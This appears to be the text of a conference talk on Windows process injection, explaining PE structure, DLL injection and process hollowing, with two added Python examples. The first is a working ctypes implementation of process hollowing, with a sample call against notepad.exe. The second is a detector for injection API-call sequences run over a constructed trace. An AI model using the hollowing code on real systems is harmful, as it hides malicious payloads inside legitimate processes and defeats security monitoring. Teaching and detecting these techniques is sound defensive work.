Process Injection
Malware style
Who am I
• Security Researcher
• PwC: Consultant
• Former student UGent
• {@ -F-G}/SanderDemeester
Outline
• Windows processes: An introduction
• Dll Injection
• Process replacement
• Questions
Windows PE
• It’s a file format!
• It contains the information needed to load and run the executable
• It’s THE Windows format for every executable image
• DLL
• EXE
• SYS (drivers)
• Imports - functions this module calls from other libraries
• Exports - functions this module makes available to other modules
• NT Headers - used by the Windows loader
• Sections - .text, .rdata, .data,…
• Relocations - fix-ups applied when the image cannot be mapped at its preferred base address
• Resources - strings, icons, …
• Much more..
PE - A short demo
What is a process?
• It’s the execution of a program
• One or more threads run in the context of a process
• Thread - conceptually, an execution unit inside the process
Process as a structure
• Fine.. a process is a thing that runs in the system..
• The OS uses different kernel structures to manage those processes
• Remember, a process believes it has the whole address space to itself..
EPROCESS
• The executive’s process object, in kernel mode
• One EPROCESS per process
• Used by the kernel for I/O transfers and for managing the process’s virtual memory
• Drivers get the current one with PsGetCurrentProcess()
PEB
• Structure in user space
• Used by operating-system code that runs in user space (ntdll, kernel32)
• Contains information about the running process
• Command-line parameters, pointer to the process heap, image base address
• A pointer to PEB_LDR_DATA
PEB_LDR_DATA
• Contains information about the loaded modules associated with the running process
• Holds the anchors of the doubly linked lists that contain each loaded module
• One LDR_DATA_TABLE_ENTRY per loaded module
TIB
• Stores information about the current thread (it is the start of the TEB)
• Reached through the FS segment register on x86 and GS on x64
• Used to obtain information about the running thread
• Things like the SEH chain, stack base and stack limit
• Access to the thread local storage array
• The surrounding TEB also holds the pointer to the PEB
PEB, TIB - A short demo
So…What does this mean?
• Different Windows components need to interact with the process
• Windows APIs need to provide access to that information
Process in memory
• There is something called virtual memory
• It maps the addresses a process uses onto physical addresses; the set of addresses a process can use is its virtual address space
• That address space is a collection of contiguous regions (image, heaps, stacks, mapped files)
• Each process thinks.. it’s all mine
Virtual memory - A short demo
Virtual memory
• Mapping virtual memory addresses onto physical addresses
• Base relocation: fixing up absolute addresses at load time when the image is not mapped at its preferred base
• Relative virtual addresses, or RVAs: offsets from the image base instead of absolute addresses
• They just make the job of the loader easier: an RVA stays valid wherever the image lands
• Three types of “addresses”
• Logical addresses: the perspective of the running process
• Linear addresses: logical addresses after segment translation
• Physical addresses: linear addresses after page table translation
Injection.. Why?
• We would like to hide the fact that we are running code
• Makes deployment a lot easier
• Bypass security filters that decide per process, such as application firewall rules
DLL Injection
• Force a different process to load a DLL at runtime
• Use the Windows API
• The loader automatically calls the DLL’s DllMain when it is loaded
• The DLL runs with the same rights as the target process
• Everything the malicious code does will appear to come from the target process
DLL Injection - Why?
• Everything the malicious code does will appear to come from the target process
• It inherits all the permissions of that process
• It can read (and write) that process’s virtual memory directly, because it runs inside it
DLL Injection - Demo
DLL injection steps
• The injector obtains a handle to the victim process
• Most often it enumerates processes with CreateToolhelp32Snapshot, Process32First and Process32Next
• Obtain the process ID
• Obtain a handle to the process (OpenProcess)
DLL injection steps
• Make room in the victim for the DLL path: allocate enough memory in the victim process (VirtualAllocEx)
• Write only the path string into the virtual memory of our victim (WriteProcessMemory)
• Obtain the address of LoadLibraryA in kernel32; it is the same in every process of the same bitness
DLL injection steps
• CreateRemoteThread is used to create and start a thread in the victim process
• Of its parameters, three do the work
• hProcess - the process handle
• lpStartAddress - starting point of the code for our new thread; in our case LoadLibraryA
• lpParameter - the argument for the new thread: the address of the DLL path we wrote
DLL Injection - code constructs
Process replacement - Why?
• Disguise malware as a legitimate process
• Must not crash the host process and risk being discovered
• Same permissions as the replaced process
Process replacement
• Processes are just bytes in memory
• Overwrite the memory space of our victim process
• Disguises our code as a legitimate process
• Inherit all the permissions of the replaced process
Process replacement - How would we do it?
• Create a process in a suspended state
• Replace all the code and memory in the process with our code
• Run the process
• Easy!
Process replacement - A short demo
What do we need?
• A different “process” (a PE image) to replace the existing one with
• A way to “stop” a legitimate process that is running
• A lot of information on the legitimate process
• A way to write into the virtual memory of a different process
• A brain that works
Windows resources
• A program contains “resources”
• Usually raw images, bitmaps and dialog boxes
• But it can contain whatever we want
• Steganography? Anyone?
• Let’s put a PE in it!
Resource Hacker - A short demo
Process replacement steps
• Load our PE payload out of the resource section
• Create the host process with the CREATE_SUSPENDED flag
• Get the thread context (GetThreadContext) of the suspended process’s primary thread
• On x86, the EBX register of that thread points to the PEB
Process replacement steps
• The PEB holds a lot of information about the process, including the image base address of the host
• NtUnmapViewOfSection, an undocumented native API, unmaps the host’s image from memory
• It is a Windows Native System Services routine exported by ntdll: resolve it at runtime and call it through a function pointer
• We need to place our payload PE into memory
• Obtain the image base address (ImageBase) and the size of our program (SizeOfImage) from its optional header
• Call VirtualAllocEx with the handle of the suspended process (the process handle, not the thread handle), request the payload’s preferred image base and SizeOfImage bytes, and set the permissions of the allocated memory to PAGE_EXECUTE_READWRITE
• So far so good
• Start parsing the PE file to obtain pointers to the different sections
• SizeOfHeaders sits at a fixed offset in the optional header
• NumberOfSections sits at a fixed offset in the file header
• Copy the headers (SizeOfHeaders bytes) to the image base in the virtual address space of the suspended process
• Read each IMAGE_SECTION_HEADER and perform some pointer calculations
• Keep going..
• Using the fields of IMAGE_SECTION_HEADER
• SizeOfRawData - how many bytes of the section are in the file
• PointerToRawData - the file offset where they start
• VirtualAddress - the RVA where they belong in memory
• We perform pointer calculations to copy the data over: SizeOfRawData bytes from file offset PointerToRawData go to ImageBase + VirtualAddress
Are we done yet?
• The Windows loader has done most of the work
• We need to tell it where to jump to
• Patch the original program’s entry point with the one from our PE file
• On x86, lpContext->Eax holds the address the primary thread will start at; set it to our ImageBase + AddressOfEntryPoint
• Call SetThreadContext to write the updated thread context back
• Resume the suspended process (ResumeThread)
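The whole procedure, from the PE header and section pointer math described above (which is also the RVA-versus-file-offset distinction from the virtual memory slides) to the SetThreadContext/ResumeThread finish, as an added example in Python with ctypes; it is not the talk's demo code. parse_pe32, map_image, build_sample_pe and hollow are names chosen here, the header offsets are those of IMAGE_NT_HEADERS32 and IMAGE_SECTION_HEADER, and hollow assumes 32-bit Python on Windows with a 32-bit host EXE because the EBX/EAX convention is the x86 CONTEXT layout. The sample PE is constructed for the example and does not apply relocations, so the payload's preferred base must be free in the host.

```python
"""Process replacement (hollowing) as the steps above describe it. Added example,
not the talk's demo code. parse_pe32()/map_image() are plain Python and show the
header and section pointer math; hollow() drives Win32 through ctypes and needs
32-bit Python on Windows with a 32-bit host EXE, because EBX-holds-the-PEB and
EAX-holds-the-entry-point are the x86 thread-context layout the slides use."""
import ctypes
import struct
import sys

U32 = ctypes.c_uint32
CREATE_SUSPENDED, MEM_COMMIT_RESERVE, PAGE_EXECUTE_READWRITE = 0x4, 0x3000, 0x40
CONTEXT_FULL_X86 = 0x10007

class CONTEXT32(ctypes.Structure):
    """winnt.h CONTEXT for x86 (716 bytes): Ebx at offset 164, Eax at 176."""
    _fields_ = [("ContextFlags", U32), ("Dr", U32 * 6), ("FloatSave", ctypes.c_ubyte * 112),
                ("SegGs", U32), ("SegFs", U32), ("SegEs", U32), ("SegDs", U32),
                ("Edi", U32), ("Esi", U32), ("Ebx", U32), ("Edx", U32), ("Ecx", U32),
                ("Eax", U32), ("Ebp", U32), ("Eip", U32), ("SegCs", U32), ("EFlags", U32),
                ("Esp", U32), ("SegSs", U32), ("ExtendedRegisters", ctypes.c_ubyte * 512)]

def parse_pe32(data):
    """Fields hollowing needs, read at their fixed offsets in IMAGE_NT_HEADERS32 + section table."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ image")
    nt = struct.unpack_from("<I", data, 0x3C)[0]                  # e_lfanew
    if data[nt:nt + 4] != b"PE\0\0":
        raise ValueError("bad NT signature")
    nsec = struct.unpack_from("<H", data, nt + 6)[0]              # FileHeader.NumberOfSections
    opt_size = struct.unpack_from("<H", data, nt + 20)[0]         # FileHeader.SizeOfOptionalHeader
    opt = nt + 24                                                 # IMAGE_OPTIONAL_HEADER32
    if struct.unpack_from("<H", data, opt)[0] != 0x10B:
        raise ValueError("only PE32 handled (the EBX/EAX context is x86)")
    pe = {"entry_rva": struct.unpack_from("<I", data, opt + 16)[0],      # AddressOfEntryPoint
          "image_base": struct.unpack_from("<I", data, opt + 28)[0],     # ImageBase
          "size_of_image": struct.unpack_from("<I", data, opt + 56)[0],  # SizeOfImage
          "size_of_headers": struct.unpack_from("<I", data, opt + 60)[0],
          "sections": []}
    for i in range(nsec):                                         # 40-byte IMAGE_SECTION_HEADERs
        name, vsize, va, raw_size, raw_ptr = struct.unpack_from("<8sIIII", data, opt + opt_size + 40 * i)
        pe["sections"].append((name.rstrip(b"\0"), va, vsize, raw_ptr, raw_size))
    return pe

def map_image(data):
    """Lay the file out as the loader would: headers first, then each section at its RVA."""
    pe = parse_pe32(data)
    image = bytearray(pe["size_of_image"])
    image[:pe["size_of_headers"]] = data[:pe["size_of_headers"]]
    for name, va, _, raw_ptr, raw_size in pe["sections"]:
        chunk = data[raw_ptr:raw_ptr + raw_size]                  # file offset -> bytes
        if len(chunk) != raw_size or va + raw_size > len(image):
            raise ValueError("section %r does not fit" % name)
        image[va:va + raw_size] = chunk                           # -> ImageBase + VirtualAddress
    return pe, bytes(image)

def build_sample_pe(code=b"\x90\x90\xc3"):
    """Constructed minimal PE32 with one .text section, so the parser/mapper can run offline."""
    dos = bytearray(64); dos[:2] = b"MZ"; struct.pack_into("<I", dos, 0x3C, 64)
    file_hdr = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 224, 0x102)
    opt = bytearray(224); struct.pack_into("<H", opt, 0, 0x10B)
    for off, val in ((16, 0x1000), (28, 0x400000), (32, 0x1000), (36, 0x200), (56, 0x2000), (60, 0x200)):
        struct.pack_into("<I", opt, off, val)   # entry, ImageBase, SectionAlignment, FileAlignment, SizeOfImage, SizeOfHeaders
    sec = struct.pack("<8sIIIIIIHHI", b".text", len(code), 0x1000, 0x200, 0x200, 0, 0, 0, 0, 0x60000020)
    headers = (dos + b"PE\0\0" + file_hdr + opt + sec).ljust(0x200, b"\0")
    return bytes(headers + code.ljust(0x200, b"\0"))

def hollow(host_exe, payload):
    """The slide procedure end to end (32-bit Python on Windows, 32-bit host). Returns the PID."""
    if sys.platform != "win32" or ctypes.sizeof(ctypes.c_void_p) != 4:
        raise RuntimeError("needs 32-bit Python on Windows")
    k32, nt, P = ctypes.windll.kernel32, ctypes.windll.ntdll, ctypes.c_void_p
    pe, image = map_image(payload)
    si = ctypes.create_string_buffer(68); struct.pack_into("<I", si, 0, 68)   # STARTUPINFOA.cb
    pi = ctypes.create_string_buffer(16)                                        # PROCESS_INFORMATION
    if not k32.CreateProcessA(host_exe.encode(), None, None, None, False, CREATE_SUSPENDED,
                              None, None, si, pi):
        raise ctypes.WinError()
    h_proc, h_thread, pid, _ = struct.unpack("<IIII", pi.raw)
    ctx = CONTEXT32(ContextFlags=CONTEXT_FULL_X86)
    k32.GetThreadContext(h_thread, ctypes.byref(ctx))
    host_base = U32()                                   # x86 PEB: ImageBaseAddress at PEB+8
    k32.ReadProcessMemory(h_proc, P(ctx.Ebx + 8), ctypes.byref(host_base), 4, None)
    nt.NtUnmapViewOfSection(h_proc, P(host_base.value))  # evict the host's own image
    k32.VirtualAllocEx.restype = P
    remote = k32.VirtualAllocEx(h_proc, P(pe["image_base"]), pe["size_of_image"],
                                MEM_COMMIT_RESERVE, PAGE_EXECUTE_READWRITE)
    if remote != pe["image_base"]:                      # this example does not apply relocations
        raise RuntimeError("payload's preferred ImageBase is not free in the host")
    k32.WriteProcessMemory(h_proc, P(remote), image, len(image), None)
    k32.WriteProcessMemory(h_proc, P(ctx.Ebx + 8), ctypes.byref(U32(remote)), 4, None)  # fix PEB
    ctx.Eax = remote + pe["entry_rva"]                  # EAX: where the primary thread will start
    k32.SetThreadContext(h_thread, ctypes.byref(ctx))
    k32.ResumeThread(h_thread)
    return pid
```

`hollow(r"C:\Windows\SysWOW64\notepad.exe", open("payload.exe", "rb").read())` is the shape of a call on a 32-bit interpreter. The PEB's ImageBaseAddress is rewritten after the allocation so that anything walking the PEB later sees the new base, and the preferred-base check stands in for the relocation pass a real implementation would need when the host already occupies that range.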
Process replacement - code constructs
Is this still the same process?
• How do you define a process?
• As far as Windows is concerned, a process is whatever is loaded into memory under that process object
• Observed through the API it is still the original process: same PID, same image name
Can we detect this?
• Monitor for suspicious sequences of API calls (suspended create, unmap, remote write, SetThreadContext, resume)
• Compare the code sections of the running process with the ones in the file on disk
• Define rules for how a program should behave and compare against what it does
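The first and third detection ideas above, worked through as an added example that is not part of the talk: a rule engine that runs over cross-process API-call events and flags the two sequences this deck describes. The event-line format, the rule names and the sample trace are all constructed for the example; in production the events would come from ETW, Sysmon or an EDR sensor rather than a text file.

```python
"""Behavioural detection of the two injection patterns from the talk, run over
API-call trace lines. Added example, not from the original deck. The trace
format (ts src=<pid> dst=<pid> api=<Name> [flags=A|B]) and the sample lines
are constructed for this example; a real feed would be ETW/Sysmon/EDR events."""
import re
from collections import defaultdict

LINE = re.compile(r"^(?P<ts>\S+) src=(?P<src>\d+) dst=(?P<dst>\d+) api=(?P<api>\w+)"
                  r"(?: flags=(?P<flags>[\w|]+))?$")

# Each rule is an ordered list of steps; a step is satisfied by any (api, required-flag) alternative.
RULES = {
    "process_hollowing": [
        [("CreateProcess", "CREATE_SUSPENDED")],
        [("NtUnmapViewOfSection", None), ("VirtualAllocEx", "PAGE_EXECUTE_READWRITE")],
        [("WriteProcessMemory", None)],
        [("SetThreadContext", None)],
        [("ResumeThread", None)],
    ],
    "remote_thread_dll_injection": [
        [("OpenProcess", None)], [("VirtualAllocEx", None)],
        [("WriteProcessMemory", None)], [("CreateRemoteThread", None)],
    ],
}


def parse_trace(text):
    """Yield one event dict per well-formed line; malformed lines are skipped, not fatal."""
    for line in text.splitlines():
        m = LINE.match(line.strip())
        if m:
            flags = set(m["flags"].split("|")) if m["flags"] else set()
            yield {"ts": m["ts"], "src": int(m["src"]), "dst": int(m["dst"]),
                   "api": m["api"], "flags": flags}


def matches(events, steps):
    """Ordered-subsequence match: every step must occur, in order, somewhere in the stream."""
    i = 0
    for ev in events:
        if any(ev["api"] == api and (flag is None or flag in ev["flags"]) for api, flag in steps[i]):
            i += 1
            if i == len(steps):
                return True
    return False


def detect(text):
    """Group cross-process calls by (actor, target) and test every rule on each stream."""
    streams = defaultdict(list)
    for ev in parse_trace(text):
        if ev["src"] != ev["dst"]:          # a process touching its own memory is normal
            streams[(ev["src"], ev["dst"])].append(ev)
    return [(name, src, dst) for (src, dst), evs in streams.items()
            for name, steps in RULES.items() if matches(evs, steps)]


# Constructed trace: one LoadLibrary injection (4120 -> 5208), one hollowing (7712 -> 8004),
# and a benign launcher (9100 -> 9140) that creates a child suspended and simply resumes it.
SAMPLE_TRACE = """\
10:00:01.000 src=4120 dst=4120 api=VirtualAlloc flags=PAGE_READWRITE
10:00:01.100 src=4120 dst=5208 api=OpenProcess
10:00:01.101 src=4120 dst=5208 api=VirtualAllocEx flags=PAGE_READWRITE
10:00:01.102 src=4120 dst=5208 api=WriteProcessMemory
10:00:01.103 src=4120 dst=5208 api=CreateRemoteThread
10:00:02.000 src=7712 dst=8004 api=CreateProcess flags=CREATE_SUSPENDED
10:00:02.001 src=7712 dst=8004 api=NtUnmapViewOfSection
10:00:02.002 src=7712 dst=8004 api=VirtualAllocEx flags=PAGE_EXECUTE_READWRITE
10:00:02.003 src=7712 dst=8004 api=WriteProcessMemory
10:00:02.004 src=7712 dst=8004 api=SetThreadContext
10:00:02.005 src=7712 dst=8004 api=ResumeThread
10:00:03.000 src=9100 dst=9140 api=CreateProcess flags=CREATE_SUSPENDED
10:00:03.050 src=9100 dst=9140 api=ResumeThread
"""

if __name__ == "__main__":
    for finding in detect(SAMPLE_TRACE):
        print("%s: pid %d -> pid %d" % finding)
```

The benign launcher in the sample is the point of keying the rules on the whole sequence: CREATE_SUSPENDED alone is what debuggers and some installers do, so the hollowing rule only fires once a remote write and a SetThreadContext follow it against the same child. The matcher is order-only; a production rule would also bound the time window and the thread that performed the calls.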
What other techniques do we have?
• Direct injection
• Local and remote hook injection
• Detour hijacking
• APC injection from user space and kernel space
• I’m sure, many more.
BSidesLV 2015
• Injection on Steroids: Code-less code injection and
0-day techniques..
• State-of-the-art
(*(*FNPTR)(LPVOID, *char))(QUESTIONS, ”?”)